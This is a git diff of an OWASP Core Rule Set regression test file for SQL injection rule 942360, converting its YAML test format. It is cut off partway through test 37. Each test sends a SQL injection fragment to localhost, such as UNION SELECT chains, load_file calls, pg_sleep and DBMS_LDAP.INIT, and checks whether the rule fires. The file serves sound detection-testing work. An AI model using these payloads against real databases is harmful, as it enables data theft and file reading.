b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942360.yaml index 860b3b9..3631ba1 100644 --- a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942360.yaml +++ b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942360.yaml @@ -1,671 +1,669 @@ --- meta: author: "Christian S.J. Peron, Christoph Hansen, Franziska Buehler, azurit" - description: None - enabled: true - name: 942360.yaml +rule_id: 942360 tests: - - test_title: 942360-1 + - test_id: 1 desc: "concatenated basic SQL injection and SQLLFI" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - # 23423 as "sdfsdfs" FROM table - data: "var=1234%20AS%20%22foobar%22%20FROM%20tablevar2=whatever" - version: HTTP/1.0 - output: - log_contains: id "942360" - - test_title: 942360-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + # 23423 as "sdfsdfs" FROM table + data: "var=1234%20AS%20%22foobar%22%20FROM%20tablevar2=whatever" + version: HTTP/1.0 + output: + log: + expect_ids: [942360] + - test_id: 2 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "select Char(" - version: HTTP/1.0 - output: - log_contains: id "942360" - - test_title: 942360-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "select Char(" + version: HTTP/1.0 + output: + log: + expect_ids: [942360] + - test_id: 3 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "SELECT CHAR(" - version: HTTP/1.0 - output: - log_contains: id "942360" - - test_title: 942360-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "SELECT CHAR(" + version: HTTP/1.0 + output: + log: + expect_ids: [942360] + - test_id: 4 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "SELECT GROUP_CONCAT(" - version: HTTP/1.0 - output: - log_contains: id "942360" - - test_title: 942360-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "SELECT GROUP_CONCAT(" + version: HTTP/1.0 + output: + log: + expect_ids: [942360] + - test_id: 5 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "SELECT group_cOnCat(" - version: HTTP/1.0 - output: - log_contains: id "942360" - - test_title: 942360-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "SELECT group_cOnCat(" + version: HTTP/1.0 + output: + log: + expect_ids: [942360] + - test_id: 6 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "select load_file(" - version: HTTP/1.0 - output: - log_contains: id "942360" - - test_title: 942360-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "select load_file(" + version: HTTP/1.0 + output: + log: + expect_ids: [942360] + - test_id: 7 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "` AS `edit_user_id` from" - version: HTTP/1.0 - output: - log_contains: id "942360" - - test_title: 942360-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "` AS `edit_user_id` from" + version: HTTP/1.0 + output: + log: + expect_ids: [942360] + - test_id: 8 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=%60+REGEXP%20" - version: HTTP/1.0 - output: - log_contains: id "942360" - - test_title: 942360-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=%60+REGEXP%20" + version: HTTP/1.0 + output: + log: + expect_ids: [942360] + - test_id: 9 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "` AS `OXTIMESTAMP` from" - version: HTTP/1.0 - output: - log_contains: id "942360" - - test_title: 942360-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "` AS `OXTIMESTAMP` from" + version: HTTP/1.0 + output: + log: + expect_ids: [942360] + - test_id: 10 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "(load_file(" - version: HTTP/1.0 - output: - log_contains: id "942360" - - test_title: 942360-11 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "(load_file(" + version: HTTP/1.0 + output: + log: + expect_ids: [942360] + - test_id: 11 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "` AS `documentType` FROM" - version: HTTP/1.0 - output: - log_contains: id "942360" - - test_title: 942360-12 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "` AS `documentType` FROM" + version: HTTP/1.0 + output: + log: + expect_ids: [942360] + - test_id: 12 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "SELECT load_file(" - version: HTTP/1.0 - output: - log_contains: id "942360" - - test_title: 942360-13 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "SELECT load_file(" + version: HTTP/1.0 + output: + log: + expect_ids: [942360] + - test_id: 13 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "6 As\" from" - version: HTTP/1.0 - output: - log_contains: id "942360" - - test_title: 942360-14 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "6 As\" from" + version: HTTP/1.0 + output: + log: + expect_ids: [942360] + - test_id: 14 desc: GH issue 1580 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: ", aside from" - version: HTTP/1.0 - output: - no_log_contains: id "942360" - - test_title: 942360-15 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: ", aside from" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942360] + - test_id: 15 desc: GH issue 1605 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "a=/create" - version: HTTP/1.0 - output: - no_log_contains: id "942360" - - test_title: 942360-16 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "a=/create" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942360] + - test_id: 16 desc: GH issue 1605 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "a=/CREATE TABLE Persons" - version: HTTP/1.0 - output: - log_contains: id "942360" - - test_title: 942360-17 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "a=/CREATE TABLE Persons" + version: HTTP/1.0 + output: + log: + expect_ids: [942360] + - test_id: 17 desc: GH issue 1816 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: " Delete (Trashcan)" - version: HTTP/1.0 - output: - no_log_contains: id "942360" - - test_title: 942360-18 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: " Delete (Trashcan)" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942360] + - test_id: 18 desc: GH issue 1816 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "5desc" - version: HTTP/1.0 - output: - no_log_contains: id "942360" - - test_title: 942360-19 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "5desc" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942360] + - test_id: 19 desc: GH issue 1816 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "34-delete" - version: HTTP/1.0 - output: - no_log_contains: id "942360" - - test_title: 942360-20 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "34-delete" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942360] + - test_id: 20 desc: GH issue 1816 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: " update" - version: HTTP/1.0 - output: - no_log_contains: id "942360" - - test_title: 942360-21 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: " update" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942360] + - test_id: 21 desc: GH issue 1816 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "/select-quote" - version: HTTP/1.0 - output: - no_log_contains: id "942360" - - test_title: 942360-22 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "/select-quote" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942360] + - test_id: 22 desc: GH issue 1816 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: " Update: After..." - version: HTTP/1.0 - output: - no_log_contains: id "942360" - - test_title: 942360-23 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: " Update: After..." + version: HTTP/1.0 + output: + log: + no_expect_ids: [942360] + - test_id: 23 desc: GH issue 1816 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "\"desc\"" - version: HTTP/1.0 - output: - no_log_contains: id "942360" - - test_title: 942360-24 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "\"desc\"" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942360] + - test_id: 24 desc: GH issue 1816 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "a=/load.php" - version: HTTP/1.0 - output: - no_log_contains: id "942360" - - test_title: 942360-25 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "a=/load.php" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942360] + - test_id: 25 desc: GH issue 1816 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "a=/update-assets" - version: HTTP/1.0 - output: - no_log_contains: id "942360" - - test_title: 942360-26 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "a=/update-assets" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942360] + - test_id: 26 desc: GH issue 1816 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "bla blabla live update chart" - version: HTTP/1.0 - output: - no_log_contains: id "942360" - - test_title: 942360-27 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "bla blabla live update chart" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942360] + - test_id: 27 desc: GH issue 1816 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: ".select-gws-banana" - version: HTTP/1.0 - output: - no_log_contains: id "942360" - - test_title: 942360-28 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: ".select-gws-banana" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942360] + - test_id: 28 desc: GH issue 1816 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "blablabla. As evidence from the following blablabla" - version: HTTP/1.0 - output: - no_log_contains: id "942360" - - test_title: 942360-29 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "blablabla. As evidence from the following blablabla" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942360] + - test_id: 29 desc: GH issue 1816 - Known false positive stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "||(SELECT(DBMS_LDAP.INIT('169.1.1.1',19))FROM(DUAL))/investigate" - version: HTTP/1.0 - output: - no_log_contains: id "942360" - - test_title: 942360-30 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "||(SELECT(DBMS_LDAP.INIT('169.1.1.1',19))FROM(DUAL))/investigate" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942360] + - test_id: 30 desc: GH issue 1816 - Known false positive stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "'||(select(pg_sleep(15))where(true))||'/investigate" - version: HTTP/1.0 - output: - no_log_contains: id "942360" - - test_title: 942360-31 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "'||(select(pg_sleep(15))where(true))||'/investigate" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942360] + - test_id: 31 desc: GH issue 1816 - Known false positive stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "UNION ALL SELECT NULL,NULL,CONCAT(CONCAT('qqkjq','mxTSrPILRz'),'qvxvq')-- sqCV" - version: HTTP/1.0 - output: - no_log_contains: id "942360" - - test_title: 942360-32 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "UNION ALL SELECT NULL,NULL,CONCAT(CONCAT('qqkjq','mxTSrPILRz'),'qvxvq')-- sqCV" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942360] + - test_id: 32 desc: GH issue 1816 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "2020-03-01 UNION ALL SELECT CONCAT" - version: HTTP/1.0 - output: - log_contains: id "942360" - - test_title: 942360-33 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "2020-03-01 UNION ALL SELECT CONCAT" + version: HTTP/1.0 + output: + log: + expect_ids: [942360] + - test_id: 33 desc: GH issue 1816 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "x\"; SELECT LOAD_FILE('" - version: HTTP/1.0 - output: - log_contains: id "942360" - - test_title: 942360-34 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "x\"; SELECT LOAD_FILE('" + version: HTTP/1.0 + output: + log: + expect_ids: [942360] + - test_id: 34 desc: GH issue 1816 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "-1 UNION SELECT null,123456,null,null,null,null--" - version: HTTP/1.0 - output: - log_contains: id "942360" - - test_title: 942360-35 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "-1 UNION SELECT null,123456,null,null,null,null--" + version: HTTP/1.0 + output: + log: + expect_ids: [942360] + - test_id: 35 desc: GH issue 1816 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "(CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(112)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (6557=6557" - version: HTTP/1.0 - output: - log_contains: id "942360" - - test_title: 942360-36 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "(CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(112)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (6557=6557" + version: HTTP/1.0 + output: + log: + expect_ids: [942360] + - test_id: 36 desc: GH issue 1816 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: ") UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--" - version: HTTP/1.0 - output: - log_contains: id "942360" - - test_title: 942360-37 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: ") UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--" + version: HTTP/1.0 + output: + log: + expect_ids: [942360] + - test_id: 37 desc: GH issue 1816 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "1 union select 